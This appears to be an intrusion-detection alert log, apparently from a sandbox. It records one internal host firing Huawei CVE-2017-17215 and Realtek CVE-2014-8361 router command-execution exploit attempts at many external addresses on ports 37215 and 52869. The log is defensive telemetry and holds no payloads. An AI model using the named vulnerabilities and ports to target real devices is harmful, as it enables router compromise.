                                                07/20/24-23:05:38.949221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317437215192.168.2.1441.112.127.7
                                                07/20/24-23:05:39.677505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527437215192.168.2.1441.192.38.248
                                                07/20/24-23:05:39.945161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614108652869192.168.2.14171.254.202.145
                                                07/20/24-23:05:57.216313TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615798852869192.168.2.14181.109.235.229
                                                07/20/24-23:06:18.564435TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614627252869192.168.2.1452.159.47.88
                                                07/20/24-23:05:33.862992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727437215192.168.2.1492.57.180.103
                                                07/20/24-23:05:38.953817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928037215192.168.2.1441.144.1.130
                                                07/20/24-23:05:36.327720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914437215192.168.2.1441.62.12.100
                                                07/20/24-23:05:57.224112TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613283252869192.168.2.14155.180.189.24
                                                07/20/24-23:06:11.223856TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613644452869192.168.2.14130.30.125.75
                                                07/20/24-23:06:50.079146TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25363652869192.168.2.14149.61.158.243
                                                07/20/24-23:05:40.355569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24449052869192.168.2.1450.25.2.217
                                                07/20/24-23:05:33.862992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285037215192.168.2.14157.183.228.205
                                                07/20/24-23:05:37.457748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3517052869192.168.2.1437.213.85.230
                                                07/20/24-23:06:01.963469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5847052869192.168.2.14201.146.209.197
                                                07/20/24-23:05:39.039093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268437215192.168.2.14157.110.79.95
                                                07/20/24-23:05:42.233806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023637215192.168.2.14175.163.152.29
                                                07/20/24-23:05:59.404275TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24505052869192.168.2.14138.215.99.180
                                                07/20/24-23:05:39.771399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573237215192.168.2.14157.123.195.63
                                                07/20/24-23:05:52.639265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23689852869192.168.2.14181.136.224.195
                                                07/20/24-23:05:38.957923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431637215192.168.2.1441.143.141.142
                                                07/20/24-23:06:34.627679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5864052869192.168.2.14139.66.24.82
                                                07/20/24-23:05:37.549791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072252869192.168.2.1458.236.61.29
                                                07/20/24-23:05:35.486669TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615536052869192.168.2.14135.221.59.240
                                                07/20/24-23:06:17.435643TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25235452869192.168.2.14200.16.112.137
                                                07/20/24-23:06:03.311372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904037215192.168.2.1441.45.226.105
                                                07/20/24-23:06:05.885283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5349452869192.168.2.1474.150.135.84
                                                07/20/24-23:06:04.825020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4500052869192.168.2.1489.143.75.194
                                                07/20/24-23:05:38.951134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109237215192.168.2.14201.240.134.48
                                                07/20/24-23:05:47.120793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4389437215192.168.2.14102.245.159.117
                                                07/20/24-23:05:52.697720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3987052869192.168.2.1420.39.144.53
                                                07/20/24-23:06:12.981585TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25787852869192.168.2.14203.255.46.180
                                                07/20/24-23:05:35.559388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3759452869192.168.2.14137.29.148.187
                                                07/20/24-23:05:36.360019TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614774452869192.168.2.14200.238.182.46
                                                07/20/24-23:05:40.237125TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613478252869192.168.2.14204.197.104.210
                                                07/20/24-23:06:05.138503TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615424852869192.168.2.1445.62.223.206
                                                07/20/24-23:06:19.955933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3798252869192.168.2.14162.188.233.6
                                                07/20/24-23:05:35.230515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4158652869192.168.2.14103.132.88.33
                                                07/20/24-23:05:45.749770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3697452869192.168.2.14106.251.202.103
                                                07/20/24-23:05:59.582686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615005052869192.168.2.14152.73.13.116
                                                07/20/24-23:06:19.575886TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615317652869192.168.2.14124.7.34.105
                                                07/20/24-23:05:35.201041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616062852869192.168.2.1452.136.210.121
                                                07/20/24-23:05:35.974201TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615513652869192.168.2.14114.225.14.65
                                                07/20/24-23:05:36.325897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3841037215192.168.2.14157.135.248.171
                                                07/20/24-23:06:51.729184TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614295852869192.168.2.14135.110.187.16
                                                07/20/24-23:05:37.601961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23833852869192.168.2.14208.117.82.120
                                                07/20/24-23:05:34.656192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600237215192.168.2.14157.155.131.147
                                                07/20/24-23:05:39.897315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4524252869192.168.2.14157.151.72.129
                                                07/20/24-23:05:57.516715TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26085652869192.168.2.148.115.28.187
                                                07/20/24-23:06:12.647376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4344652869192.168.2.1472.181.203.143
                                                07/20/24-23:05:59.136809TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24809252869192.168.2.14207.85.188.236
                                                07/20/24-23:05:47.086079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052037215192.168.2.1441.128.226.219
                                                07/20/24-23:05:34.662485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892037215192.168.2.1441.188.190.222
                                                07/20/24-23:05:36.327823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523037215192.168.2.14212.102.177.184
                                                07/20/24-23:05:37.542289TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25455052869192.168.2.14134.144.46.130
                                                07/20/24-23:05:45.409134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473037215192.168.2.1441.235.155.97
                                                07/20/24-23:06:09.667246TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613516852869192.168.2.14109.172.98.3
                                                07/20/24-23:05:37.446803TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23375452869192.168.2.14188.199.48.64
                                                07/20/24-23:05:58.772622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5447452869192.168.2.14102.163.53.206
                                                07/20/24-23:05:38.661785TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3609252869192.168.2.1445.131.99.6
                                                07/20/24-23:05:52.570834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5438652869192.168.2.14147.243.70.201
                                                07/20/24-23:05:56.048573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369237215192.168.2.14157.31.102.66
                                                07/20/24-23:05:35.574592TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662652869192.168.2.14148.195.201.170
                                                07/20/24-23:05:37.556915TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24087452869192.168.2.1498.139.133.85
                                                07/20/24-23:06:40.564079TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614531052869192.168.2.14204.10.66.64
                                                07/20/24-23:05:40.453690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4123652869192.168.2.14140.200.78.210
                                                07/20/24-23:05:57.943746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614375652869192.168.2.1417.146.227.125
                                                07/20/24-23:06:02.606012TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24739652869192.168.2.14162.186.165.69
                                                07/20/24-23:05:37.474845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4965852869192.168.2.1439.176.203.73
                                                07/20/24-23:05:45.811748TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615399452869192.168.2.1473.39.239.240
                                                07/20/24-23:05:56.056582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004237215192.168.2.14197.76.13.230
                                                07/20/24-23:06:13.391443TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3431452869192.168.2.14150.164.92.90
                                                07/20/24-23:05:34.622534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191037215192.168.2.14157.98.20.252
                                                07/20/24-23:06:27.822681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615273252869192.168.2.14177.18.126.192
                                                07/20/24-23:05:36.325773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430237215192.168.2.14197.168.71.172
                                                07/20/24-23:05:40.430092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5152052869192.168.2.14142.238.12.119
                                                07/20/24-23:06:26.204720TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614934052869192.168.2.14212.18.133.150
                                                07/20/24-23:05:46.709144TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5094652869192.168.2.1486.160.0.18
                                                07/20/24-23:05:58.758911TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24853052869192.168.2.1434.148.232.132
                                                07/20/24-23:05:56.997034TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4551252869192.168.2.14132.82.133.46
                                                07/20/24-23:06:01.801044TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4458852869192.168.2.14162.24.224.160
                                                07/20/24-23:05:56.036527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919037215192.168.2.1441.106.233.29
                                                07/20/24-23:05:59.394050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4284052869192.168.2.14123.2.215.104
                                                07/20/24-23:06:19.786611TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613344252869192.168.2.1449.66.14.28
                                                07/20/24-23:06:15.274610TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615131852869192.168.2.14200.16.112.137
                                                07/20/24-23:05:59.058741TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613543052869192.168.2.1461.154.240.237
                                                07/20/24-23:05:59.849854TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4182252869192.168.2.14216.198.201.137
                                                07/20/24-23:05:37.454499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24814452869192.168.2.14134.214.175.73
                                                07/20/24-23:06:01.893152TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3336852869192.168.2.14158.14.58.53
                                                07/20/24-23:06:09.106479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5377652869192.168.2.14140.134.248.178
                                                07/20/24-23:06:20.035971TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3290252869192.168.2.1434.68.31.177
                                                07/20/24-23:05:57.571973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5961252869192.168.2.14106.97.250.162
                                                07/20/24-23:06:07.972042TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613649452869192.168.2.14101.62.253.33
                                                07/20/24-23:05:37.612113TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24416652869192.168.2.1446.103.116.159
                                                07/20/24-23:06:16.731750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613761252869192.168.2.14188.42.211.0
                                                07/20/24-23:06:01.275898TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3506252869192.168.2.14122.77.226.22
                                                07/20/24-23:05:59.118555TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615844452869192.168.2.14219.4.1.236
                                                07/20/24-23:06:00.191114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3564452869192.168.2.14146.125.220.156
                                                07/20/24-23:06:02.324702TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24583652869192.168.2.14113.163.150.34
                                                07/20/24-23:05:40.421092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23737452869192.168.2.14161.126.18.243
                                                07/20/24-23:06:02.017303TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25568452869192.168.2.1445.62.223.206
                                                07/20/24-23:05:45.193921TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613725652869192.168.2.14120.185.72.185
                                                07/20/24-23:05:40.444876TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25201252869192.168.2.1450.94.4.19
                                                07/20/24-23:05:40.446932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4034652869192.168.2.14219.160.119.18
                                                07/20/24-23:05:40.462908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3382252869192.168.2.1497.6.189.98
                                                07/20/24-23:05:35.843525TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615021252869192.168.2.14173.89.193.209
                                                07/20/24-23:05:38.971654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310237215192.168.2.14157.0.49.184
                                                07/20/24-23:05:39.875016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5859452869192.168.2.1474.254.17.92
                                                07/20/24-23:05:39.680161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4926237215192.168.2.14157.64.66.226
                                                07/20/24-23:05:45.988990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138237215192.168.2.1441.235.201.216
                                                07/20/24-23:05:35.827188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4027052869192.168.2.14198.163.171.175
                                                07/20/24-23:06:01.986039TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6045852869192.168.2.1423.100.51.122
                                                07/20/24-23:06:17.536919TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5244852869192.168.2.14191.102.18.87
                                                07/20/24-23:06:01.048493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615960052869192.168.2.14208.186.76.120
                                                07/20/24-23:05:46.257796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5655452869192.168.2.148.133.12.9
                                                07/20/24-23:05:50.557201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556837215192.168.2.14167.49.186.162
                                                07/20/24-23:07:04.345966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6069652869192.168.2.14167.123.39.124
                                                07/20/24-23:06:19.714340TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613766452869192.168.2.14162.188.233.6
                                                07/20/24-23:06:34.260416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613783852869192.168.2.14181.198.232.113
                                                07/20/24-23:06:21.839686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613319652869192.168.2.14146.223.122.107
                                                07/20/24-23:05:39.117518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961052869192.168.2.1423.7.74.55
                                                07/20/24-23:05:57.153869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3527652869192.168.2.14220.246.104.60
                                                07/20/24-23:05:48.788274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777637215192.168.2.1441.143.125.179
                                                07/20/24-23:06:13.006675TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614929052869192.168.2.14130.198.32.116
                                                07/20/24-23:05:50.498027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3427237215192.168.2.14157.40.99.163
                                                07/20/24-23:06:21.074396TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5527852869192.168.2.14111.77.250.222
                                                07/20/24-23:05:45.437584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158637215192.168.2.1441.43.228.105
                                                07/20/24-23:06:02.113509TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3597652869192.168.2.1449.168.241.228
                                                07/20/24-23:05:39.494301TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615444052869192.168.2.1492.247.141.149
                                                07/20/24-23:05:42.256029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082037215192.168.2.1441.43.107.114
                                                07/20/24-23:07:12.667310TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615971852869192.168.2.1417.149.245.24
                                                07/20/24-23:05:52.570741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3405252869192.168.2.14182.31.232.148
                                                07/20/24-23:06:09.080473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4077452869192.168.2.1461.85.255.31
                                                07/20/24-23:06:13.684507TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616041852869192.168.2.14217.178.244.70
                                                07/20/24-23:06:00.971446TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23806052869192.168.2.14174.28.203.137
                                                07/20/24-23:05:36.325662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134837215192.168.2.1441.70.222.142
                                                07/20/24-23:05:37.472706TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5510852869192.168.2.1417.184.234.0
                                                07/20/24-23:05:37.476168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25006452869192.168.2.14198.22.21.63
                                                07/20/24-23:05:55.877930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899837215192.168.2.1418.59.179.247
                                                07/20/24-23:06:16.651508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5151452869192.168.2.1459.38.213.21
                                                07/20/24-23:05:37.455022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5081452869192.168.2.14199.117.44.204
                                                07/20/24-23:05:57.832966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3489852869192.168.2.14119.200.79.245
                                                07/20/24-23:06:00.123303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4944452869192.168.2.14188.68.33.45
                                                07/20/24-23:06:02.345691TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5046452869192.168.2.141.81.237.194
                                                07/20/24-23:07:36.558559TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5054452869192.168.2.1418.214.245.19
                                                07/20/24-23:05:40.471609TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25436052869192.168.2.1439.183.105.121
                                                07/20/24-23:05:34.627949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3495837215192.168.2.14157.201.151.163
                                                07/20/24-23:06:07.230869TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25913452869192.168.2.14165.137.205.188
                                                07/20/24-23:05:47.782204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3290652869192.168.2.1445.216.246.4
                                                07/20/24-23:05:57.032993TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26009252869192.168.2.14106.31.240.76
                                                07/20/24-23:05:52.504672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4272052869192.168.2.14134.147.18.133
                                                07/20/24-23:06:19.888801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5367652869192.168.2.14112.35.155.8
                                                07/20/24-23:05:46.246572TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614580252869192.168.2.14151.188.92.157
                                                07/20/24-23:05:37.487251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5165452869192.168.2.14173.89.193.209
                                                07/20/24-23:05:57.575004TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613817452869192.168.2.14186.153.223.147
                                                07/20/24-23:05:38.957923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660237215192.168.2.14197.146.253.34
                                                07/20/24-23:06:08.497924TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613987052869192.168.2.14200.147.46.193
                                                07/20/24-23:05:38.170018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5575252869192.168.2.14100.187.132.120
                                                07/20/24-23:05:36.320247TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613601652869192.168.2.14185.59.206.117
                                                07/20/24-23:06:03.208973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4819252869192.168.2.142.16.233.94
                                                07/20/24-23:05:46.543705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4506652869192.168.2.14187.153.198.62
                                                07/20/24-23:06:09.547041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4650652869192.168.2.14103.249.11.195
                                                07/20/24-23:05:36.065114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269652869192.168.2.1446.103.116.159
                                                07/20/24-23:05:52.450049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26030052869192.168.2.14106.160.141.160
                                                07/20/24-23:05:45.838207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614004252869192.168.2.14175.10.5.126
                                                07/20/24-23:05:47.101729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772837215192.168.2.1441.209.183.81
                                                07/20/24-23:06:24.373833TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4918652869192.168.2.14115.179.211.118
                                                07/20/24-23:05:59.290948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23563252869192.168.2.14184.183.98.168
                                                07/20/24-23:05:36.018251TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613628052869192.168.2.1478.147.130.95
                                                07/20/24-23:05:58.378138TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614614852869192.168.2.14125.193.155.236
                                                07/20/24-23:06:05.138503TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24016252869192.168.2.14171.66.243.60
                                                07/20/24-23:06:05.981181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4185052869192.168.2.1438.245.190.228
                                                07/20/24-23:05:39.904017TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614878052869192.168.2.14129.213.65.68
                                                07/20/24-23:06:17.564288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4665652869192.168.2.14159.160.235.206
                                                07/20/24-23:06:00.196025TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613647252869192.168.2.1471.185.114.186
                                                07/20/24-23:06:14.614915TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615731652869192.168.2.1419.50.129.57
                                                07/20/24-23:07:34.258673TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24712852869192.168.2.1432.94.211.34
